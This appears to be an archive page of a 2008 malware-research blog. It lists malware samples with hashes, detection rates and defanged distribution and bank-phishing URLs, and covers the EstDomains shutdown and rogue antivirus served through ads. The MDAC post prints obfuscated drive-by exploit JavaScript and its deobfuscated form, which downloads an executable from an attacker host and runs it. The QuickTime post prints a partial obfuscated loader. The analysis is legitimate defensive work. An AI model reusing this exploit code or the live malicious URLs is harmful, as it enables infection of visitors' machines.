Malware Distribution | Malware Database

Archive for the 'Malware Distribution' Category

Nov

Database Update - 16 Files (Low-Moderate Detection)

By djpnuemo 0 Comments

Categories: Database Update, Infection, Low Detection, Malicious Domains, Malicious Links, Malware, Malware Distribution, Rogue Anti-Malware, Rogue Security Software, Rogue Software and Rootkit

Another update for tonight. Should have more over the weekend. Find them in /pnuemo-malware/.

BE ADVISED: These URL’s may still be active. Proceed at your own risk!

services.exe
Result: 19/36 (52.78%)
MD5: c629db60a9a5d7303419b5153d3e9b0b
VirusTotal
ThreatExpert Analysis

nd82m0.dll
Result: 5/36 (13.89%)
MD5: d6f2135dc562c7d4992cf2cea2166707
VirusTotal
ThreatExpert Analysis
hxxp://85.17.166.182

kb600179.dll
Result: 5/36 (13.89%)
MD5: f946f8c3de445d45c7eb34591bee037b
VirusTotal
ThreatExpert Analysis
hxxp://89.188.16.30

setup_457_6777_.exe
Result: 1/36 (2.78%)
MD5: e9339f9045368947789ec70739de4b21
VirusTotal
ThreatExpert Analysis
hxxp://files.download-antispyware.com

scanner_457_6777_.exe
Result: 16/36 (44.44%)
MD5: e0f855c6c5fc93f0a8ed1fe9e702e492
VirusTotal
ThreatExpert Analysis
hxxp://dl.storage-antispyware.com/get/

42.exe
Result: 4/36 (11.12%)
MD5: f5201b9e77b7b31443b4e0e6190e219f
VirusTotal
ThreatExpert Analysis
hxxp://85.92.157.141/mxlivemedia/

msansspc.dll
Result: 6/36 (16.67%)
MD5: 3cc545e42b9bb14df4a63f2a37aebdb0
VirusTotal
ThreatExpert Analysis

mvnzivtlmzhxi.dll
Result: 7/36 (19.45%)
MD5: 7614e7448f1983b9641e9699f67576a4
VirusTotal
ThreatExpert Analysis

pdf.pdf
Result: 6/36 (16.67%)
MD5: a3f83503a165a19c4b01328463175cd7
VirusTotal
hxxp://activision.cc/1/spl

twext.exe
Result: 11/36 (30.56%)
MD5: 5767c816cb20753976df2edb60eaf448
VirusTotal
ThreatExpert Analysis

load.exe
Result: 12/36 (33.34%)
MD5: 9b467bdc6dd1b3e68651b7039cd373c8
VirusTotal
ThreatExpert Analysis
hxxp://activision.cc/1/

xcvb.pdf
Result: 4/36 (11.12%)
MD5: e3b86145de00ebfab3e3159d24b81104
VirusTotal
hxxp://91.203.92.137/xcv/

install.exe
Result: 16/36 (44.45%)
MD5: 0869881865032bd1b3b08d82e5e4f404
VirusTotal
ThreatExpert Analysis
hxxp://91.203.92.137/xcv/

beep.sys & figaro.sys
Result: 29/36 (80.56%)
MD5: c4618f889863b5aa357f5f5ba8f353d6
VirusTotal
ThreatExpert Analysis

brastk.exe
Result: 14/36 (38.89%)
MD5: 0d63a88fdb4259de8280f8bb7d78ec35
VirusTotal
ThreatExpert Analysis

KB908268.exe
Result: 7/36 (19.45%)
MD5: 504eb66e741186a61792862f0a83ff82
VirusTotal
ThreatExpert Analysis
hxxp://76.74.239.143/weruoiq/

msansspc.dll
Result: 6/36 (16.67%)
MD5: 3cc545e42b9bb14df4a63f2a37aebdb0
VirusTotal
ThreatExpert Analysis

Nov

EstDomains shut down effective November 24th, 2008

By djpnuemo 0 Comments

Categories: Malicious Domains, Malware and Malware Distribution

I thought it was worth noting that today ICANN finally decided to terminate EstDomains ability to register domains. EstDomains has turned the other cheek to their clients use of their services. The shutting down of some, if not all of their registered domains, will definitely help in slowing down the spread of some new malware. Although the gangs I’m sure have already planned for this and have started to move some of their operations.

The termination of ICANN-accredited registrar EstDomains is to go ahead, effective 24 November 2008.

On 28 October 2008, ICANN sent a notice of termination to EstDomains, Inc. (EstDomains) based on an Estonian Court record reflecting the conviction of EstDomains’ then president, Vladimir Tsastsin, of credit card fraud, money laundering and document forgery.

Pursuant to Section 5.3 of the Registrar Accreditation Agreement (RAA), ICANN may terminate the RAA before its expiration when, “Any officer or director of [a] Registrar is convicted of a felony or of a misdemeanor related to financial activities, or is adjudged by a court to have committed fraud or breach of fiduciary duty, or is the subject of judicial determination that ICANN deems as the substantive equivalent of any of these; provided such officer or director is not removed in such circumstances.”

ICANN received a response from EstDomains on 29 October in which it indicated that the Estonian Court record on which ICANN relied was not final and had been appealed. ICANN pended the termination of EstDomains’ RAA to analyze the claims made by EstDomains and to obtain independent information regarding the status of the alleged appeal.

On 7 November 2008, EstDomains was informed that, based on ICANN’s findings, ICANN was proceeding with the termination of EstDomains’ RAA, effective 24 November 2008.

ICANN’s records indicate that EstDomains manages approximately 281,000 domain names. To protect the interests of registrants, on 28 October 2008, ICANN published a Request for Informations seeking expressions of interest from registrars to receive a bulk transfer of the domain names managed by de-accredited registrar EstDomains.

ICANN is analyzing the responses to that request and will take measures to effectuate a smooth transition of the domain names managed by EstDomains to a qualified ICANN- accredited registrar.

Courtesy of ICANN

Oct

Ocean Bank phishing/malware distribution through fake SSL certificate

By djpnuemo 1 Comment

Categories: Database Update, Malicious Domains, Malicious Links, Malware, Malware Distribution and Phishing

Found another phishing/malware distribution scheme this time using Ocean Bank. Just as the ones we’ve seen in the past, it pushes a file to download that they say is a SSL certificate needed for security purposes. As you’ll see below there are quite a few URL’s pushing this malware and the ones listed are just a fraction of the total number. Once the file is run, it installs a rootkit to the system. The sample is available in /pnuemo-malware/.

BE ADVISED: These URL’s may still be active. Proceed at your own risk.

Oceanmultissl.exe (Downloads or Creates: s.exe)
Result: 21/34 (61.77%)
MD5: c4906f64d0ea19dab7a9e7626ee40781
VirusTotal
ThreatExpert Analysis

s.exe & 9129837.exe (Downloads or Creates: 9129837.exe & new_drv.sys)
Result: 18/36 (50%)
MD5: d951f3a8e3485c3c150ba17c0f53db86
VirusTotal
ThreatExpert Analysis

new_drv.sys
Result: 34/36 (94.45%)
MD5: a54de1d46ff7bdefbf9d9284c1916c5e
VirusTotal
ThreatExpert Analysis

ns1.domensinter.com
ns2.domensinter.com

hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.siteminderagent.verification.0wylzehgk.edfrkti.com/103541.html?/renewmirror/verification
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.siteminderagent.demystifying.1vzohkwd0.edfrkti.com/103541.html?/ptcontrol/services
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.sessionervlet.procedure.gnyit07m8.edfrkti.com/103541.html?/onlineupdate/rnalid
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.sessionervlet.portalserver.jdv6kcukz.ceuewys.com/103541.html?/comreportid/onlineupdate
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.sessionervlet.portalserver.ifzsgwhsm.edfrkti.com/103541.html?/customerlogin/comservlet
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.sessionervlet.bankonenet.9sxkghaq8.gineehg.com/103541.html?/viewcontent/rnalid
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.servletdologin.renewmirror.mnskscirl.ceuewys.com/103541.html?/sitesurvey/encrypted
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.servletdologin.ptcontrol.jcpptbgdz.ceuewys.com/103541.html?/procedure/actionvalidate
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.servletdologin.carehtmlclient.lg3qhifus.ceuewys.com/103541.html?/memberverify/onlineupdate
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.servletdologin.bankonenet.aldz11d6n.gineehg.com/103541.html?/bankonenet/bankonline
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.services.rnalid.gyomouftr.reueys.com/103541.html?/securitychallenge/memberverify
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.services.portalserver.fkquawuv8.ceuewys.com/103541.html?/verification/exacttrget
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.selfservice.servletdologin.jgu801sal.edfrkti.com/103541.html?/servletdologin/bankonenet
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.securitychallenge.certificateupdate.dpf29qakc.edfrkti.com/103541.html?/bankonline/sessionervlet
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.rnalid.portalserver.rczkjzpmm.reuybso.com/103541.html?/memberverify/procedure
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.rnalid.onlineupdatemirror.pqwzbc38r.reueys.com/103541.html?/communitypage/configlogin
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.renewmirror.slapiservlet.kjlxlurym.gineehg.com/103541.html?/certificateUpdate/carehtmlclient
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.renewmirror.demystifying.kululslhk.edfrkti.com/103541.html?/cfmasternbank/certificateUpdate
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.renewmirror.comreportid.0hbfmxry5.reueys.com/103541.html?/configlogin/selfservice
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.renewmirror.bankonenet.jrbks5mu1.reueys.com/103541.html?/demystifying/comreportid
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.ptcontrol.sessionervlet.zsbtlddf1.gineehg.com/103541.html?/doexte/certificateUpdate
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.ptcontrol.ptcontrol.e9s82vmjo.edfrkti.com/103541.html?/ptcontrol/comreportid
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.ptcontrol.productsremote.uj8mqt7af.edfrkti.com/103541.html?/carehtmlclient/verification
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.ptcontrol.portalserver.uhdirryyz.edfrkti.com/103541.html?/services/comreportid
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.ptcontrol.bankonline.xfadkkfg9.reueys.com/103541.html?/services/configlogin
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.privatelogin.onlineupdatemirror.hia3rhicq.edfrkti.com/103541.html?/linkbrowse/sessionervlet
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.privatelogin.exacttrget.sl1iyagjp.reueys.com/103541.html?/comservlet/communitypage
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.privatelogin.demystifying.ebulerhz1.reuybso.com/103541.html?/linkbrowse/selfservice
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.privatelogin.carehtmlclient.m0fz6fjtp.reuybso.com/103541.html?/customerlogin/configlogin
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.portalserver.renewmirror.e4s0uhfhb.edfrkti.com/103541.html?/communitypage/comservlet
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.portalserver.exacttrget.mkcxdf604.reueys.com/103541.html?/onlineupdatemirror/portalserver
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.portalserver.communitypage.f3lg1sydw.edfrkti.com/103541.html?/carehtmlclient/demystifying
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.onlineupdate.services.bodkqha20.edfrkti.com/103541.html?/communitypage/carehtmlclient
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.memberverify.certificateupdate.h5sfn919q.gineehg.com/103541.html?/exacttrget/sessionervlet
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.linkbrowse.privatelogin.ehe2hxod6.edfrkti.com/103541.html?/privatelogin/services
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.exacttrget.demystifying.djzxt6l3z.edfrkti.com/103541.html?/bankonenet/portalserver
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.encrypted.siteminderagent.oit17c3jq.edfrkti.com/103541.html?/sessionervlet/certificateUpdate
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.demystifying.rnalid.p7jzbwnji.gineehg.com/103541.html?/renewmirror/sitesurvey
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.demystifying.ptcontrol.utqnl5dg0.ceuewys.com/103541.html?/exacttrget/privatelogin

Oct

M&I Bank Malware/Phishing Websites

By djpnuemo 0 Comments

Categories: Malicious Domains, Malicious Links, Malware, Malware Distribution and Phishing

There is a campaign to spread malware through fake M&I Bank websites. The malware that these pages try to install were feature in todays database update and can be accessed through /pnuemo-malware/MIbankcertificate.zip in our repository.

Below is a screenshot of the website along with a list of some of the domains hosting these pages. Luckily both Firefox and Internet Explorer detected these as suspicious pages.

hxxp://businessportal.mibank.mibusinessonlinebanking.qzbpkh9in1q7mzd.bankonenet.services.wlienex.com/subsections.htm?/actionvalidate/onlineupdate/OSL.htm?LOB=3163895149&refer=bpkH9iN1Q7mzDrZ
hxxp://businessportal.mibank.mibusinessonlinebanking.sybzjefp95juuqd.bankonline.configlogin.bineeo.com/subsections.htm?/viewcontent/privatelogin/OSL.htm?LOB=0820757379&refer=bZjEFP95juuQd8T
hxxp://businessportal.mibank.mibusinessonlinebanking.hgt7nxvcm13ieqf.renewmirror.siteminderagent.sddgus.com/subsections.htm?/carehtmlclient/bankonline/OSL.htm?LOB=6355552810&refer=T7nXvCm13IEqfNX
hxxp://businessportal.mibank.mibusinessonlinebanking.4xgbf1wlvys8xl4.doexte.linkbrowse.sddgus.com/subsections.htm?/actionvalidate/ptcontrol/OSL.htm?LOB=5425746488&refer=gbf1WlVyS8xl4Xg
hxxp://businessportal.mibank.mibusinessonlinebanking.sb0pryfloi89guq.renewmirror.productsremote.bineeo.com/subsections.htm?/doexte/exacttrget/OSL.htm?LOB=8754725917&refer=0PrYFloI89GuQAR
hxxp://businessportal.mibank.mibusinessonlinebanking.ibxtphpk5roeojr.comservlet.servletdologin.bineeo.com/subsections.htm?/procedure/privatelogin/OSL.htm?LOB=5359068295&refer=XTPHPk5rOEOJrK4
hxxp://businessportal.mibank.mibusinessonlinebanking.9cl3xftk4ni9t9t.servletdologin.ptcontrol.bineeo.com/subsections.htm?/onlineupdate/configlogin/OSL.htm?LOB=1831421831&refer=L3Xftk4nI9T9tv5
hxxp://businessportal.mibank.mibusinessonlinebanking.ynqcyrmfqwjt2st.bankonenet.comreportid.bueozia.com/subsections.htm?/bankonline/customerlogin/OSL.htm?LOB=2678391850&refer=QCyrmFqWJt2stbY
hxxp://businessportal.mibank.mibusinessonlinebanking.j880s7k6hjwpqsz.onlineupdate.onlineupdate.bueozia.com/subsections.htm?/configlogin/customerlogin/OSL.htm?LOB=2783087268&refer=80S7k6HjwpQSzmp
hxxp://businessportal.mibank.mibusinessonlinebanking.4vlhcq1ray5plj8.securitychallenge.configlogin.sddgus.com/subsections.htm?/verification/encrypted/OSL.htm?LOB=1963750084&refer=lhCQ1RAy5Plj8qn
hxxp://businessportal.mibank.mibusinessonlinebanking.w4kjtij48tuycyg.bankonenet.carehtmlclient.bueozia.com/subsections.htm?/cfmasternbank/doexte/OSL.htm?LOB=7399944416&refer=kJtij48TUYCYgR6

Oct

Database Update - 9 Files (Low-Moderate Detection)

By djpnuemo 0 Comments

Categories: Database Update, Malicious Domains, Malicious Links, Malware, Malware Codec and Malware Distribution

Here is a fresh round of new malware. All files are available under /pnuemo-malware/ in our repository.

BE ADVISED: These domains may still be active. Proceed at your own risk!

MIbankcertificate.exe (Download/Creates the files: 9129837.exe, new_drv.sys, & s.exe)
Result: 6/36 (16.67%)
MD5: 6a5c95ca74f538155b36bb8146920e3b
VirusTotal
ThreatExpert Analysis
hxxp://businessportal.mibank.mibusinessonlinebanking.ytb4odaguh6n7ga.rnalid.carehtmlclient.mdwiers.com

s.exe & 9129837.exe
Result: 4/36 (11.12%)
MD5: 7b09e457f412bf841e04d37658e678db
VirusTotal
ThreatExpert Analysis
hxxp://lodnew.com

new_drv.sys
Result: 33/36 (91.67%)
MD5: a54de1d46ff7bdefbf9d9284c1916c5e
VirusTotal
Sunbelt Sandbox

zcodec.1067.exe
Result: 9/36 (25%)
MD5: e288a47163d936343ca3f7c36d07c08b
VirusTotal
ThreatExpert Analysis
hxxp://codecdownload.funsoft-enjoyportal.com

setup_110144_3_.exe
Result: 4/36 (11.12%)
MD5: 92c50bb6ad9c7edd923cd1ac82a9ccdd
VirusTotal
ThreatExpert Analysis
hxxp://files.pc-security-downloads.com

b156.exe (Download/Creates the files: Twain.exe)
Result: 14/36 (38.89%)
MD5: 05411d4f5b6a3b430dcd30bea1731362
VirusTotal
ThreatExpert Analysis
hxxp://dl2.bundlext.com:8080

Twain.exe
Result: 16/36 (44.45%)
MD5: 13d526cefcef5d5f9e49baf7c56dd5db
VirusTotal
Sunbelt Sandbox

keygen.Cool.Burning.Studio.3.1c30 (Download/Creates the files: 30980.exe)
Result: 8/36 (22.23%)
MD5: a136a6370f9d9cef72cf1e3563bace00
VirusTotal
ThreatExpert Analysis
hxxp://city-codec.net/download

30980.exe
Result: 9/36 (25%)
MD5: 5f2b7907b87f7000938aa9cd17cdcd0f
VirusTotal
ThreatExpert Analysis

Oct

Fake PornTube websites installing malware (Revisted)

By djpnuemo 0 Comments

Categories: Database Update, Malicious Domains, Malicious Links, Malware, Malware Distribution and Porntube

There are more and more fake PornTube websites appearing these days. They’re being installed on unsuspecting webservers that have vulnerable software on them. They are usually uploaded through SQL injection exploits. Here is a look again at these fake sites.

BE ADVISED: The URL’s listed may still be live. Proceed at your own risk. Files available in /pnuemo-malware/.

The user will be directed to the initial page which will instantly redirect them to the next page, which is always the same.

hxxp://domain.com/index1.php -> hxxp://domain.com/index14.php

Continue reading ‘Fake PornTube websites installing malware (Revisted)’

Oct

MDAC Exploit Page (iexplorer.exe)

By djpnuemo 0 Comments

Categories: Database Update, Malware Distribution and Vulnerabilities

We discovered another exploit page that will inject malware on to the users computer by way of a vulnerability in MDAC. The initial page is loaded with obfuscated code. When deobfuscated, it exploits Adobe and then opens the loader page in which the malware payload is injected. Below is analysis of the exploit page along with the malware information. The binary has very few real detections, most are just heuristics. This file is available in the repository under /pnuemo-malware/.

BE ADVISED: Websites may still be active, proceed at your own risk.

hxxp://gavai-pegc9.ws/Gpack/index.php

<html><head><meta HTTP-EQUIV=”REFRESH” content=”3; URL=index.php?404″><script language=
JavaScript>str = “ru`su)(:gtobuhno!ru`su)(!zw`s!{`e!<!enbtldou/bsd`udDmdldou)&nckdbu&(:{`e/rdu
@uushctud)&he&-&{`e&(:{`e/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&
*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(:usx!zw`s!p!<!{`e/Bsd`udNckdbu)&lr&*#yl#*&m3
&*#/#*&YL&*#MI#*&U&*&UQ&-&&(:w`s!r!<!{`e/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#n
o#-&&(:w`s!u!<!{`e/Bsd`udNckdbu)&`e&*&ne&*#c/#*&ru&*#sd#*&`l&-&&(:usx!z!u/uxqd!<!0:
p/nqdo)&F&*#D#*&U&-&iuuq;..f`w`h,qdfb8/vr.Fq`bj.mn`e/qiq&-g`mrd(:p/rdoe)(:!u/nqdo)(:u/Vshu
d)p/sdrqnordCnex(:w`s!o`ld!<!&/..//..hdyqmnsds/dyd&:u/R`wdUnGhmd)o`ld-3(:u/Bmnrd)(:|!b`ub
i)d(!z|usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z||b`ubi)d(z||”;str2 = “”;for (i = 0; i < str.length; i ++) { s
tr2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></head></html>

deobfuscates to:

start();
function start() {
var zad = document.createElement(’object’);
zad.setAttribute(’id’,'zad’);
zad.setAttribute(’classid’,'cl’+’si’+”d:BD”+”96C5″+’56-65A3-1′+”1D0-98″+’3A-00′+”C04″+’FC2′+”9E”+
‘36′);
try {
var q = zad.CreateObject(’ms’+”xm”+’l2′+”.”+’XM’+”LH”+’T'+’TP’,”);
var s = zad.CreateObject(”Shel”+”l.Ap”+”pl”+”icati”+”on”,”);
var t = zad.CreateObject(’ad’+'od’+”b.”+’st’+”re”+’am’,”);
try { t.type = 1;
q.open(’G'+”E”+’T',’http://gavai-pegc9.ws/Gpack/load.php’,false);
q.send(); t.open();
t.Write(q.responseBody);
var name = ‘.//..//iexplorer.exe’;
t.SaveToFile(name,2);
t.Close();
} catch(e) {}
try { s.shellexecute(name); } catch(e) {}}
catch(e){}}

hxxp://gavai-pegc9.ws/Gpack/load.php downloads the malware binary.

file.exe
Result: 9/36 (25%)
MD5: e427f1c2438259b5b4bb386aec822e30
VirusTotal
ThreatExpert Sandbox Analysis

Sep

Malspam: Notices from IRS (taxform_for_print.scr)

By djpnuemo 0 Comments

Categories: E-mail, MalSpam, Malicious Links, Malware, Malware Distribution and Social Engineering

Here is a piece of malspam we received that poses to be from the IRS telling you that you are due for a refund. The one we got was from taxinform32@taxreducers.com. Simply follow the steps below and the money is yours! (Proceed at your own risk. File available in /pnuemo-malware/.)

Get Your Refund $1927.10 in Just 3 Easy Steps:
1. Print and fill a short tax interview (click to download)
2. Send it online
3. Receive your tax refund

The link included takes you to the following address and file: hxxp://freepromo.cn/documents/taxform_for_print.scr

taxform_for_print.scr
Result: 7/36 (19.45%)
MD5: a705a1df1fc36f696f0eb0fea72870d3
VirusTotal
ThreatExpert Analysis

Sep

Quicktime exploit page installs msupd_0809_upd070148.exe (VIDEO)

By djpnuemo 2 Comments

Categories: Database Update, Investigated, Malicious Domains, Malicious Links, Malware, Malware Distribution and Video

Here is an example of an exploit page. This will check the computer for certain vulnerable Quicktime browser objects. If one is discovered, it will exploit the object and inject the malware to the computer and execute it. We recorded a video of the website exploiting Quicktime and installing the malware on the system (at the bottom of the post). This binary is available in /pnuemo-malware/ in our repository. See the FAQ for access. As usual, proceed at your own risk because links are still live as of this post date. One thing I will mention, when you visit the site, it logs your IP address so on subsequent visits, you’ll get a 404.

This post is very long because of the code within the page, so to read everything, make sure to read more.

hxxp://inetppui.com/html/2440/f8ae8aedaf494548b681dedb37dd3d5f/

<script language=JavaScript>function f1(z0){var i,j,ff=0xff,z9=0xc,b=0×400,
r,z7=3,s=0,z8=”ss”,w=0,p=0,t=Array(63,62,58,34,3,30,47,43,40,6,0,0,0,0,0,
0,21,24,39,60,22,29,25,15,17,26,33,46,4,11,7,54,10,53,1,2,36,14,18,55,51,5,
16,0,0,0,0,27,0,61,59,8,48,37,9,0,19,13,41,31,23,20,57,44,52,28,38,42,32,50,
45,12,56,49,35);z2=z0;l=z2.length;for(j=Math.ceil(l/b);j>0;j–){r=”;for(i=
Math.min(l,b);i>0;l–,i–){z1=t[z2.charCodeAt(p++)-48];z3=z1<<s;w|=z3;
if(s){z4=0xe7^w;z5=z4&ff;z6=z5;w=w>>8;s-=2;r=r+String.fromCharCode(z6)}
else{z7=8;s=6;z8=”7″;z9=w}}y1=”document”;y2=”write”;eval(y1+”.”+y2+”(r)”)}}
y5=”f2″;y4=”f1″;y3=y4+’(”_0xTPKAO_08t9UAO_GjzhK8tFGaQhkqscUnyJ38TfUx
OcGjzhK8tF6vs3U7jN02oX57u3I7oK97OYhP3fUjtfUjuX2neSDCyT3IsXPIsXsEyhPx
Bh3Czhsx3YBaOsP2or5C7XUbvPMsvu2IoIlCvQIP8sIIyNhPsjU78jU7OYBPsPhsjT1s
8YBaOc08t9UAO_lc342FOvW1O42ATNbxtIG8tP3c3YOAO_zCtU9FOvW1OpVIvK5
boN6sJfS8T9S8tIlqz99jJmVAeU5nTYBEbvNjJ@5welIcJSsEyYXEbHIAeN_8TSsidSMj
tgXEbHIAeNhnzmD8OYMoT5kvWlMoT5kvWlMoTlN8tYPoTmhvpYPoTHNiJ5MoTk
kEJ5MoTkkaQDlwX9PjtwlqtmhEyw_8TSuqy@GiQYXoJVPcXYlAt9DwX9PjtwlCWlMv
dV9AtSV8dV9AtR98dV1EJZN8dVUAthMAyw_8TSuqyRPAtSMFphMAtYXoJVPcXYhv
JRPoT5NAphMoThlEtmMoT5NAphMoTHM8tZlwX9PjtwlqtlhEyw_8TSuqyRPAJSMFph
MAtSMFJ5kiQSMFpD0ipYXoJVPcXY_vJDMoTl4aQmlwX9PjtwlqtD_Eyw_8TSuqyRPAt
SMjJ99EpSMFJ5MAJSMfpZ0ipSMFpV_vQSMnQZM8QYXoJVPcXYN8QRDwX9PjtwlqtS
98dVI8JHNvdVD8WSSvdVV8Jk4vdVIaQVN8dV5ip@GAyw_8TSuqyR5atYXoJVPcXYN
Continue reading ‘Quicktime exploit page installs msupd_0809_upd070148.exe (VIDEO)’

Sep

Antivirus 2009…brought to you by Motigo

By lithium 9 Comments

Categories: Antivirus 2009, Database Update, Malicious Domains, Malware, Malware Distribution, Motigo and Rogue Software

A colleague called me today stating that his website was the victim of a hack and he did not know what to do. He was frantic and said that his website was distributing Antivirus 2009, so I decided to take a look at it and lo and behold, we found Antivirus 2009 being distributed from Motigo’s ad system.

For those who don’t know what Antivirus 2009 is, it’s a rogue (fake) security product. You can see a video of it in action here.

*Update* We have noticed our keyword search hit for “quickupdates” has increased 70% of our total keyword hit statistics over the past 24 hours. If you are viewing our site as a result of experiencing this pop-up, please leave us a comment and be sure to include what site you were on at the time.

We traced the AV09 pop-up down to the following JavaScript counter code.

The ID has been removed to protect the victims identity

< !– Begin Motigo Webstats counter code — > < a id=”*” href=”hxxp://webstats.motigo.com/”> < img src=”hxxp://m1.webstats.motigo.com/n.gif?id=*” border=”0″ alt=”Free counter and web stats” width=”18″ height=”18″ /> < script src=”hxxp://m1.webstats.motigo.com/c.js?id=*” type=”text/javascript”> < !– End Motigo Webstats counter code — >

Resulted in this pop-up being displayed on his site:

Clicking the pop-up brought us to:

hxxp://quickupdates29.com <–don’t go here

File distributed:

File: AV2009Install_*.exe (0570484B66E9A139D8FD0A71F5448957)
MDB: /lithium-malware/AV2009Install.zip

The motigo webstat counter code is responsible for several pop-up’s and one of them is Antivirus 2009. This is a scary thought. This means that everyone hosting this code on their website can potentially infected their viewers/customers. This is an extremely cost effective distribution method for the malware creators and I bet we will see more like it as time goes by.

Important note to website owners!

If you are going to use any service (free or paid), you’d better make sure you understand all of the terms and conditions. It’s not unusual for free services to be accompanied by ad’s or pop-ups but you must ask yourself the following questions before putting anything on your site.

1. What is the service providers privacy policy?

2. What are their terms of service?

3. How do they screen their affiliate links for malware/phishing attacks?

Finally, it’s important to see what their users think of the service. As we can see, Motigo has a laundry list of pop-up complaints:

Related News: PandaLabs reports on the sudden increase of rogue (fake) security products. -> Report